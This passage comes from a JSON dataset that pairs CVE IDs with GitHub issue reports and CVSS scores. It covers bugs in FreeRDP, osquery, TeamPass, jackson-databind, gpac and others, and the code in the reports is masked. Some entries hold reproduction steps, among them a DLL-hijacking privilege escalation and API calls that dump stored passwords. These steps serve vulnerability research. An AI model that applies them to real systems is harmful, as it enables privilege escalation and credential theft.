  46470. "description": "Mint baton sent to token receiver address.",
  46471. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
  46472. "severity": "HIGH",
  46473. "baseScore": 8.6,
  46474. "impactScore": 4.0,
  46475. "exploitabilityScore": 3.9
  46476. },
  46477. {
  46478. "CVE_ID": "CVE-2020-11042",
  46479. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6010",
  46480. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6010",
  46481. "Repo_new": "freerdp/freerdp",
  46482. "Issue_Created_At": "2020-03-31T06:54:51Z",
  46483. "description": "memory out of bounds read in update_read_icon_info. version APITAG vuln code APITAG first read APITAG , APITAG and APITAG from the APITAG CODETAG And then it check APITAG and APITAG APITAG Then it could call APITAG to read data from s, size is APITAG CODETAG so when APITAG and APITAG , it could lead memory out of bounds read",
  46484. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H",
  46485. "severity": "MEDIUM",
  46486. "baseScore": 5.9,
  46487. "impactScore": 5.2,
  46488. "exploitabilityScore": 0.7
  46489. },
  46490. {
  46491. "CVE_ID": "CVE-2020-11044",
  46492. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6013",
  46493. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6013",
  46494. "Repo_new": "freerdp/freerdp",
  46495. "Issue_Created_At": "2020-03-31T11:10:29Z",
  46496. "description": "double free in APITAG version APITAG vuln code APITAG first read new_len from stream, and pass the new_len to realloc Then it could call APITAG , this could free APITAG , and return NULL realloc function source code CODETAG when new_data is NULL, it could call free_cache_bitmap NUMBERTAG order to free APITAG again. Double Free! function code. CODETAG",
  46497. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46498. "severity": "LOW",
  46499. "baseScore": 2.2,
  46500. "impactScore": 1.4,
  46501. "exploitabilityScore": 0.7
  46502. },
  46503. {
  46504. "CVE_ID": "CVE-2020-11045",
  46505. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6005",
  46506. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6005",
  46507. "Repo_new": "freerdp/freerdp",
  46508. "Issue_Created_At": "2020-03-31T01:42:42Z",
  46509. "description": "memory out of bounds read in update_read_bitmap_data. vuln code ERRORTAG The function first verifies that the length of s cannot be less than NUMBERTAG and then reads NUMBERTAG bytes later. If APITAG and APITAG , it will continue to read data from the stream without check if the length in the stream is enough",
  46510. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L",
  46511. "severity": "LOW",
  46512. "baseScore": 3.3,
  46513. "impactScore": 2.5,
  46514. "exploitabilityScore": 0.7
  46515. },
  46516. {
  46517. "CVE_ID": "CVE-2020-11046",
  46518. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6006",
  46519. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6006",
  46520. "Repo_new": "freerdp/freerdp",
  46521. "Issue_Created_At": "2020-03-31T02:32:52Z",
  46522. "description": "stream out of bounds seek in update_read_synchronize could lead out of bounds read after. vuln code ERRORTAG the code just seek the stream pointer without check stream's length, it could lead APITAG , then the check in other function could failed commit APITAG",
  46523. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46524. "severity": "LOW",
  46525. "baseScore": 2.2,
  46526. "impactScore": 1.4,
  46527. "exploitabilityScore": 0.7
  46528. },
  46529. {
  46530. "CVE_ID": "CVE-2020-11047",
  46531. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6009",
  46532. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6009",
  46533. "Repo_new": "freerdp/freerdp",
  46534. "Issue_Created_At": "2020-03-31T06:00:40Z",
  46535. "description": "memory out of bounds read in APITAG version APITAG vuln code APITAG read NUMBERTAG bytes from stream without check stream's length CODETAG",
  46536. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H",
  46537. "severity": "MEDIUM",
  46538. "baseScore": 5.9,
  46539. "impactScore": 5.2,
  46540. "exploitabilityScore": 0.7
  46541. },
  46542. {
  46543. "CVE_ID": "CVE-2020-11048",
  46544. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6007",
  46545. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6007",
  46546. "Repo_new": "freerdp/freerdp",
  46547. "Issue_Created_At": "2020-03-31T05:40:01Z",
  46548. "description": "memory out of bounds read in rdp_read_flow_control_pdu. version APITAG vuln code APITAG could read NUMBERTAG byte from stream, if APITAG , it could call APITAG . ERRORTAG APITAG just read some byte from stream without check length, it could APITAG , then the check in other function could failed CODETAG",
  46549. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46550. "severity": "LOW",
  46551. "baseScore": 2.2,
  46552. "impactScore": 1.4,
  46553. "exploitabilityScore": 0.7
  46554. },
  46555. {
  46556. "CVE_ID": "CVE-2020-11049",
  46557. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6008",
  46558. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6008",
  46559. "Repo_new": "freerdp/freerdp",
  46560. "Issue_Created_At": "2020-03-31T05:49:34Z",
  46561. "description": "memory out of bounds read in APITAG version APITAG vuln code if APITAG and APITAG , it could one byte overflow read in APITAG CODETAG",
  46562. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46563. "severity": "LOW",
  46564. "baseScore": 2.2,
  46565. "impactScore": 1.4,
  46566. "exploitabilityScore": 0.7
  46567. },
  46568. {
  46569. "CVE_ID": "CVE-2020-11052",
  46570. "Issue_Url_old": "https://github.com/Sorcery/sorcery/issues/231",
  46571. "Issue_Url_new": "https://github.com/sorcery/sorcery/issues/231",
  46572. "Repo_new": "sorcery/sorcery",
  46573. "Issue_Created_At": "2020-04-30T15:06:10Z",
  46574. "description": "brute force vulnerability. Sorcery NUMBERTAG is vulnerable to brute force attacks even if an login_lock_time_period is configured. If an attacker continues their login attempts after the initial login_lock_time_period has passed, Sorcery no longer rejects those login attempts until eventually the attacker has guessed the right password. This is caused by an early return in PATHTAG which skips the update of the APITAG field. So failed attempts don't update APITAG as long as APITAG contains any date, even if already passed. I'll provide a fix.",
  46575. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46576. "severity": "CRITICAL",
  46577. "baseScore": 9.8,
  46578. "impactScore": 5.9,
  46579. "exploitabilityScore": 3.9
  46580. },
  46581. {
  46582. "CVE_ID": "CVE-2020-11054",
  46583. "Issue_Url_old": "https://github.com/qutebrowser/qutebrowser/issues/5403",
  46584. "Issue_Url_new": "https://github.com/qutebrowser/qutebrowser/issues/5403",
  46585. "Repo_new": "qutebrowser/qutebrowser",
  46586. "Issue_Created_At": "2020-05-02T14:11:19Z",
  46587. "description": "Security: Reloading page with certificate errors shows a green URL. While working on APITAG I noticed that only the first load of pages with certificate errors gets a correctly colored URL. When loading a page with the default APITAG setting, there's a prompt to confirm the certificate issue: FILETAG When answering that with \"yes\", the URL is then colored yellow ( APITAG ) rather than green ( APITAG ): FILETAG However, when reloading the page (or loading it again in another tab), the URL is green: FILETAG This is because APITAG remembers the answer internally and we don't get a ERRORTAG signal anymore unfortunately there's also no API to check the certificate state of the current page... I'm handling this as a low severity security vulnerability and will request a CVE. There's no way for bad actors to exploit this and the user already did override the certificate error (so should be aware that the connection is not to be trusted), but it still lures users into a false sense of security. A fix, release and security announcement is in progress.",
  46588. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N",
  46589. "severity": "LOW",
  46590. "baseScore": 3.5,
  46591. "impactScore": 1.4,
  46592. "exploitabilityScore": 2.1
  46593. },
  46594. {
  46595. "CVE_ID": "CVE-2020-11058",
  46596. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/6011",
  46597. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/6011",
  46598. "Repo_new": "freerdp/freerdp",
  46599. "Issue_Created_At": "2020-03-31T10:46:15Z",
  46600. "description": "stream out of bounds seek in rdp_read_font_capability_set could lead out of bounds read later. version APITAG vuln code APITAG first read NUMBERTAG byte to length, then check APITAG assume APITAG and APITAG , then the program will pass the check and continue execution ERRORTAG we could control APITAG , then it could enter APITAG APITAG APITAG could call APITAG , because APITAG But currently APITAG CODETAG After APITAG done, it could APITAG Then the check in other functions could fail, and could lead out of bounds read later.",
  46601. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L",
  46602. "severity": "LOW",
  46603. "baseScore": 2.2,
  46604. "impactScore": 1.4,
  46605. "exploitabilityScore": 0.7
  46606. },
  46607. {
  46608. "CVE_ID": "CVE-2020-11073",
  46609. "Issue_Url_old": "https://github.com/MichaelAquilina/zsh-autoswitch-virtualenv/issues/122",
  46610. "Issue_Url_new": "https://github.com/michaelaquilina/zsh-autoswitch-virtualenv/issues/122",
  46611. "Repo_new": "michaelaquilina/zsh-autoswitch-virtualenv",
  46612. "Issue_Created_At": "2020-01-07T11:00:15Z",
  46613. "description": "This is incredibly insecure!. APITAG The script APITAG will be sourced without any user interaction , which will NUMBERTAG Erase the APITAG virtualenv\" message from the terminal (so the user isn't even aware that anything has happened NUMBERTAG Write the output of APITAG to a file called APITAG . Obviously this would be more malicious in practice",
  46614. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  46615. "severity": "HIGH",
  46616. "baseScore": 7.8,
  46617. "impactScore": 5.9,
  46618. "exploitabilityScore": 1.8
  46619. },
  46620. {
  46621. "CVE_ID": "CVE-2020-11075",
  46622. "Issue_Url_old": "https://github.com/anchore/anchore-engine/issues/430",
  46623. "Issue_Url_new": "https://github.com/anchore/anchore-engine/issues/430",
  46624. "Repo_new": "anchore/anchore-engine",
  46625. "Issue_Created_At": "2020-04-22T22:33:27Z",
  46626. "description": "Ensure only supported os overrides are used in skopeo download commands. In the anchore skopeo wrapper, as of NUMBERTAG there is logic that supports multiple attempts to download an image from a registry using a combination of os override and destination type options. The initial implementation in NUMBERTAG attempts to derive an os override option from the image manifest itself, but there are only a couple of overrides that are supported, so it would be better to explicitly enumerate them rather than attempting to use a field from the image manifest. This would have two benefits NUMBERTAG while the input is run through an internal command sanitizer, it may be possible for a string to be crafted to circumvent sanitization and cause incorrect/insecure call out to the skopeo command (e.g. potential for a command injection NUMBERTAG there are only a few known overrides that are supported, so there is no need for this field to be inferred from any input source, which would fail for any override other than the known set that are supported Suggested fix is to alter the code to use an explicit enumeration of the os override options that are supported by anchore/skopeo.",
  46627. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  46628. "severity": "CRITICAL",
  46629. "baseScore": 9.9,
  46630. "impactScore": 6.0,
  46631. "exploitabilityScore": 3.1
  46632. },
  46633. {
  46634. "CVE_ID": "CVE-2020-11081",
  46635. "Issue_Url_old": "https://github.com/osquery/osquery/issues/6426",
  46636. "Issue_Url_new": "https://github.com/osquery/osquery/issues/6426",
  46637. "Repo_new": "osquery/osquery",
  46638. "Issue_Created_At": "2020-05-01T16:55:20Z",
  46639. "description": "Privilege Escalation Bug in Osquery NUMBERTAG windows) via Dll Search Order Hijacking . Hell osquery team, As per facebook security team, they APITAG recommended to create issue here. Title Privilege Escalation Bug in Osquery NUMBERTAG windows) via Dll Hijacking Vuln Type Code Execution Product Area Open Source (e.g. HHVM) APITAG Complete Details FILETAG NUMBERTAG Create custom payload dll (image: APITAG FILETAG NUMBERTAG Create batch file to execute which include in payload dll (image: APITAG FILETAG NUMBERTAG Then,create or drop payload dll to writable folder C:\\python NUMBERTAG image: APITAG FILETAG NUMBERTAG Check the file that doesn't exist by default (image: APITAG FILETAG NUMBERTAG Then reboot pc ( It's mean user haven't permission to start service. Reboot since osqueryd service is auto). or restart the service (for testing with admin). After reboot or restart the service, Malicious dll APITAG has been loaded and payload will execute. (image: APITAG FILETAG NUMBERTAG payload dll executed as a command FILETAG /c PATHTAG and batch file executed \"whoami\" and print out to FILETAG (image: APITAG ![osquery7]( FILETAG I hope you to understand about my details steps. Thanks. With Best, Sai Wynn Myat.",
  46640. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  46641. "severity": "HIGH",
  46642. "baseScore": 8.2,
  46643. "impactScore": 6.0,
  46644. "exploitabilityScore": 1.5
  46645. },
  46646. {
  46647. "CVE_ID": "CVE-2020-11104",
  46648. "Issue_Url_old": "https://github.com/USCiLab/cereal/issues/625",
  46649. "Issue_Url_new": "https://github.com/uscilab/cereal/issues/625",
  46650. "Repo_new": "uscilab/cereal",
  46651. "Issue_Created_At": "2020-03-03T02:10:37Z",
  46652. "description": "Serializing long double variables leaks uninitialized memory. Serializing the C/C++ native type long double stores uninitialized data into the serialized form. Compile and run the following program with valgrind to observe this. CODETAG It is apparently an inherent trait of the long double type that even an initialized variable leaves some of its raw storage uninitialized. This gives valgrind errors when compiled with both gcc and clang: ERRORTAG",
  46653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46654. "severity": "MEDIUM",
  46655. "baseScore": 5.3,
  46656. "impactScore": 1.4,
  46657. "exploitabilityScore": 3.9
  46658. },
  46659. {
  46660. "CVE_ID": "CVE-2020-11105",
  46661. "Issue_Url_old": "https://github.com/USCiLab/cereal/issues/636",
  46662. "Issue_Url_new": "https://github.com/uscilab/cereal/issues/636",
  46663. "Repo_new": "uscilab/cereal",
  46664. "Issue_Created_At": "2020-03-27T23:28:34Z",
  46665. "description": "std::shared_ptr serialization asymmetry (depends on memory layout). Cereal employs caching of APITAG values, using the raw pointer as a unique identifier. This becomes problematic if an APITAG variable goes out of scope and is freed, and a new APITAG is allocated at the same address. Serialization fidelity thereby becomes dependent upon memory layout. CODETAG Output is: APITAG The input is (true, false) but the output is (true, true).",
  46666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46667. "severity": "CRITICAL",
  46668. "baseScore": 9.8,
  46669. "impactScore": 5.9,
  46670. "exploitabilityScore": 3.9
  46671. },
  46672. {
  46673. "CVE_ID": "CVE-2020-11106",
  46674. "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/603",
  46675. "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/603",
  46676. "Repo_new": "trippo/responsivefilemanager",
  46677. "Issue_Created_At": "2020-03-28T11:53:58Z",
  46678. "description": "Stored xss in NUMBERTAG in FILETAG in $_SESSION['RF'][\"view_type\"] because of no validation if FILETAG setted this session.. After taking another look at the APITAG NUMBERTAG i noticed that in the FILETAG file on line NUMBERTAG that if the $_SESSION['RF'][\"view_type\"] is already set that there would not be done any validation or would it take the data from the config. URLTAG This created a problem because in FILETAG in the \"view\" action in the \"type\" parameter it is possible to set that value without any validation. URLTAG This means if you would first request a session by going to the FILETAG , than going to the FILETAG and request the view action and as \"type\" parameter you give a html tag. Than if you done al that go back to the FILETAG page than $_SESSION['RF'][\"view_type\"] would be read and unescaped placed on all places where $view is used what created stored xss until the session isn't valid anymore. A very simple patch would be to add APITAG in the FILETAG on line NUMBERTAG when the $view is set. URLTAG I made a simple html file you can use to validate this vulnerability. It is made for Firefox because it does make use of iframe's and a clickjacking vulnerability but if the session was already set than this would also work in other browsers with a miner change. you would need to change all \" URLTAG \" to your website. When runned it would make NUMBERTAG iframe's. One to request the FILETAG file to get a PHPSESSID and to set $_SESSION['RF'][\"verify\"] as APITAG Second it would open the FILETAG to set the html tag. And tirth it reopens the FILETAG page to trigger the stored xss ERRORTAG A CVE has been requested.",
  46679. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46680. "severity": "MEDIUM",
  46681. "baseScore": 6.1,
  46682. "impactScore": 2.7,
  46683. "exploitabilityScore": 2.8
  46684. },
  46685. {
  46686. "CVE_ID": "CVE-2020-11111",
  46687. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2664",
  46688. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2664",
  46689. "Repo_new": "fasterxml/jackson-databind",
  46690. "Issue_Created_At": "2020-03-24T17:04:06Z",
  46691. "description": "Block one more gadget type (...). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46693. "severity": "HIGH",
  46694. "baseScore": 8.8,
  46695. "impactScore": 5.9,
  46696. "exploitabilityScore": 2.8
  46697. },
  46698. {
  46699. "CVE_ID": "CVE-2020-11112",
  46700. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2666",
  46701. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2666",
  46702. "Repo_new": "fasterxml/jackson-databind",
  46703. "Issue_Created_At": "2020-03-25T17:06:51Z",
  46704. "description": "Block one more gadget type (commons proxy). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46706. "severity": "HIGH",
  46707. "baseScore": 8.8,
  46708. "impactScore": 5.9,
  46709. "exploitabilityScore": 2.8
  46710. },
  46711. {
  46712. "CVE_ID": "CVE-2020-11113",
  46713. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2670",
  46714. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2670",
  46715. "Repo_new": "fasterxml/jackson-databind",
  46716. "Issue_Created_At": "2020-03-28T18:08:54Z",
  46717. "description": "Block one more gadget type ( ). APITAG in Progress) Another gadget type(s) reported regarding class(es) of [...] library. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46718. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46719. "severity": "HIGH",
  46720. "baseScore": 8.8,
  46721. "impactScore": 5.9,
  46722. "exploitabilityScore": 2.8
  46723. },
  46724. {
  46725. "CVE_ID": "CVE-2020-11441",
  46726. "Issue_Url_old": "https://github.com/phpmyadmin/phpmyadmin/issues/16056",
  46727. "Issue_Url_new": "https://github.com/phpmyadmin/phpmyadmin/issues/16056",
  46728. "Repo_new": "phpmyadmin/phpmyadmin",
  46729. "Issue_Created_At": "2020-03-30T01:21:02Z",
  46730. "description": "CRLF/HTML entity injection with most recent version of APITAG Describe the bug The login form does not properly escape CRLF sequences, this can lead to HTML entity injection at the very least, or reflected XSS at the very worst. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to APITAG NUMBERTAG Insert into the login fields, username, password, and the hidden field of target, and insert this value into those fields: APITAG and the login error will display the injected CRLF sequences, and injected url encoded entities, such as single or double quotes(double quotes are not as effective as single quotes). Expected behavior I expected the application to drop/filter out the CRLF sequences seeing as an issue similar was detected back in NUMBERTAG Screenshots FILETAG FILETAG Server configuration Operating system: Ubuntu Web server: Apache Database version: APITAG PHP version: most recent. APITAG version: most recent. Client configuration Browser: Firefox Operating system: Windows NUMBERTAG Additional context None.",
  46731. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46732. "severity": "MEDIUM",
  46733. "baseScore": 6.1,
  46734. "impactScore": 2.7,
  46735. "exploitabilityScore": 2.8
  46736. },
  46737. {
  46738. "CVE_ID": "CVE-2020-11499",
  46739. "Issue_Url_old": "https://github.com/fkie-cad/FACT_core/issues/375",
  46740. "Issue_Url_new": "https://github.com/fkie-cad/fact_core/issues/375",
  46741. "Repo_new": "fkie-cad/fact_core",
  46742. "Issue_Created_At": "2020-03-29T18:07:13Z",
  46743. "description": "Stored XSS when updating analysis details. The application does not sanitize the user input when updating the details of a firmware. When updating the firmware details, the applications posts the data to the \"upload analysis/ FILETAG Adding js to the tags field FILETAG When browsing to the home page it loads the js FILETAG js is executed FILETAG Used the escape function to sanitize the input FILETAG",
  46744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46745. "severity": "MEDIUM",
  46746. "baseScore": 6.1,
  46747. "impactScore": 2.7,
  46748. "exploitabilityScore": 2.8
  46749. },
  46750. {
  46751. "CVE_ID": "CVE-2020-11529",
  46752. "Issue_Url_old": "https://github.com/getgrav/grav/issues/3134",
  46753. "Issue_Url_new": "https://github.com/getgrav/grav/issues/3134",
  46754. "Repo_new": "getgrav/grav",
  46755. "Issue_Created_At": "2021-01-06T15:12:06Z",
  46756. "description": "APITAG Open redirect with trailing slash redirect. Environment grav version NUMBERTAG Admin NUMBERTAG php NUMBERTAG and NUMBERTAG tested Problem If grav is on root folder on a domain it seems there is a open redirect. Fist analysis Origin of the problem seems to be the redirect by setting Redirect trailing slash on. Examples Open redirect if on root folder: URLTAG Response header (short NUMBERTAG Found > location | PATHTAG It redirects to: APITAG Less(?) a problem if in subfolder: URLTAG Response header (short NUMBERTAG Found > location PATHTAG Not sure what version is running on your website but it seems not vulnerable: URLTAG",
  46757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46758. "severity": "MEDIUM",
  46759. "baseScore": 6.1,
  46760. "impactScore": 2.7,
  46761. "exploitabilityScore": 2.8
  46762. },
  46763. {
  46764. "CVE_ID": "CVE-2020-11558",
  46765. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1440",
  46766. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1440",
  46767. "Repo_new": "gpac/gpac",
  46768. "Issue_Created_At": "2020-03-24T17:16:05Z",
  46769. "description": "3 UAF bugs in box_funcs.c. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG Hi GPAC Team, I found NUMBERTAG new UAF bugs on the lastest commit NUMBERTAG eaea8 of GPAC version NUMBERTAG I think it is probably due to an imcomplete fix of the UAF bug URLTAG Actually, these new bugs share the same buggy function which is APITAG in PATHTAG with URLTAG but have different alloc function APITAG in APITAG (instead of APITAG ). Command: APITAG or APITAG NUMBERTAG UAF Bug NUMBERTAG APITAG URLTAG ASAN says: ~~~ APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG dde8 at pc NUMBERTAG c NUMBERTAG e bp NUMBERTAG fff NUMBERTAG c3b NUMBERTAG sp NUMBERTAG fff NUMBERTAG c3b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG dde8 thread T NUMBERTAG c NUMBERTAG d in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_array_del PATHTAG NUMBERTAG c5f5e in gf_isom_box_del PATHTAG NUMBERTAG c NUMBERTAG cd in gf_isom_box_array_read_ex PATHTAG NUMBERTAG ae0b0f in APITAG PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_read PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_parse_ex PATHTAG NUMBERTAG c6e NUMBERTAG in gf_isom_box_array_read_ex PATHTAG NUMBERTAG aeffe8 in APITAG PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_read PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_parse_ex PATHTAG NUMBERTAG c6e NUMBERTAG in gf_isom_box_array_read_ex PATHTAG NUMBERTAG ae NUMBERTAG in APITAG PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_read PATHTAG NUMBERTAG c NUMBERTAG in gf_isom_box_parse_ex PATHTAG NUMBERTAG c7fb4 in gf_isom_parse_root_box PATHTAG NUMBERTAG dd NUMBERTAG in gf_isom_parse_movie_boxes PATHTAG NUMBERTAG e NUMBERTAG d3 in gf_isom_parse_movie_boxes PATHTAG NUMBERTAG e NUMBERTAG d3 in gf_isom_open_file PATHTAG NUMBERTAG d in APITAG PATHTAG NUMBERTAG fca8b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG e4f8 in _start ( PATHTAG NUMBERTAG dde8 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG fca8c NUMBERTAG a in __interceptor_free ( PATHTAG NUMBERTAG c5f9f in gf_isom_box_del PATHTAG previously allocated by thread T0 here NUMBERTAG fca8c NUMBERTAG in malloc ( PATHTAG NUMBERTAG adb NUMBERTAG d in APITAG PATHTAG SUMMARY: APITAG heap use after free PATHTAG gf_isom_box_del ~~~",
  46770. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46771. "severity": "CRITICAL",
  46772. "baseScore": 9.8,
  46773. "impactScore": 5.9,
  46774. "exploitabilityScore": 3.9
  46775. },
  46776. {
  46777. "CVE_ID": "CVE-2020-11612",
  46778. "Issue_Url_old": "https://github.com/netty/netty/issues/6168",
  46779. "Issue_Url_new": "https://github.com/netty/netty/issues/6168",
  46780. "Repo_new": "netty/netty",
  46781. "Issue_Created_At": "2016-12-30T18:14:58Z",
  46782. "description": "APITAG Codecs should enforce memory allocation size limits. Expected behavior To protect against OOME the compression and decompression codecs should explicitly limit the amount of data they compress and decompress. We may be vulnerable to OOME from large or malicious input. Actual behavior In light of URLTAG most of the compression/decompression codecs don't enforce limits on buffer allocation sizes. Steps to reproduce N/A Minimal yet complete reproducer code (or URL to code) N/A Netty version NUMBERTAG SNAPSHOT JVM version (e.g. APITAG ) N/A OS version (e.g. ERRORTAG ) N/A",
  46783. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  46784. "severity": "HIGH",
  46785. "baseScore": 7.5,
  46786. "impactScore": 3.6,
  46787. "exploitabilityScore": 3.9
  46788. },
  46789. {
  46790. "CVE_ID": "CVE-2020-11619",
  46791. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2680",
  46792. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2680",
  46793. "Repo_new": "fasterxml/jackson-databind",
  46794. "Issue_Created_At": "2020-04-07T01:41:49Z",
  46795. "description": "Block one more gadget type. (note: placeholder until fixed) Another gadget type(s) reported regarding class(es) of [TO BE FILLED]. library. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46796. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46797. "severity": "HIGH",
  46798. "baseScore": 8.1,
  46799. "impactScore": 5.9,
  46800. "exploitabilityScore": 2.2
  46801. },
  46802. {
  46803. "CVE_ID": "CVE-2020-11620",
  46804. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2682",
  46805. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2682",
  46806. "Repo_new": "fasterxml/jackson-databind",
  46807. "Issue_Created_At": "2020-04-07T15:54:48Z",
  46808. "description": "Block one more gadget type (commons jelly). (note: placeholder until fixed) Another gadget type(s) reported regarding class(es) of APITAG . library. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46809. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46810. "severity": "HIGH",
  46811. "baseScore": 8.1,
  46812. "impactScore": 5.9,
  46813. "exploitabilityScore": 2.2
  46814. },
  46815. {
  46816. "CVE_ID": "CVE-2020-11671",
  46817. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2765",
  46818. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2765",
  46819. "Repo_new": "nilsteampassnet/teampass",
  46820. "Issue_Created_At": "2020-04-02T16:23:40Z",
  46821. "description": "APITAG API has no authorization checks. APITAG provides several APIs that can be used for programmatic access. None of these API functions perform authorization checks which means that any client with a valid API token is effectively an administrator. Any client with a valid API token can: Read all passwords stored by Teampass Create users. This includes non administrative users creating administrative users Update any stored item Update any user Delete any folder or item It\u2019s important to note that API access is disabled by default. Steps to reproduce NUMBERTAG Turn on API access NUMBERTAG As a non admin user, generate an API key NUMBERTAG Send authenticated HTTP requests Retrieve passwords: APITAG Note that the ID for each \u201citem\u201d starts at NUMBERTAG and increments by NUMBERTAG for each new item. This makes it easy to retrieve all items stored by Teampass APITAG Add a new admin user CODETAG Server configuration Teampass version NUMBERTAG",
  46822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  46823. "severity": "HIGH",
  46824. "baseScore": 8.1,
  46825. "impactScore": 5.2,
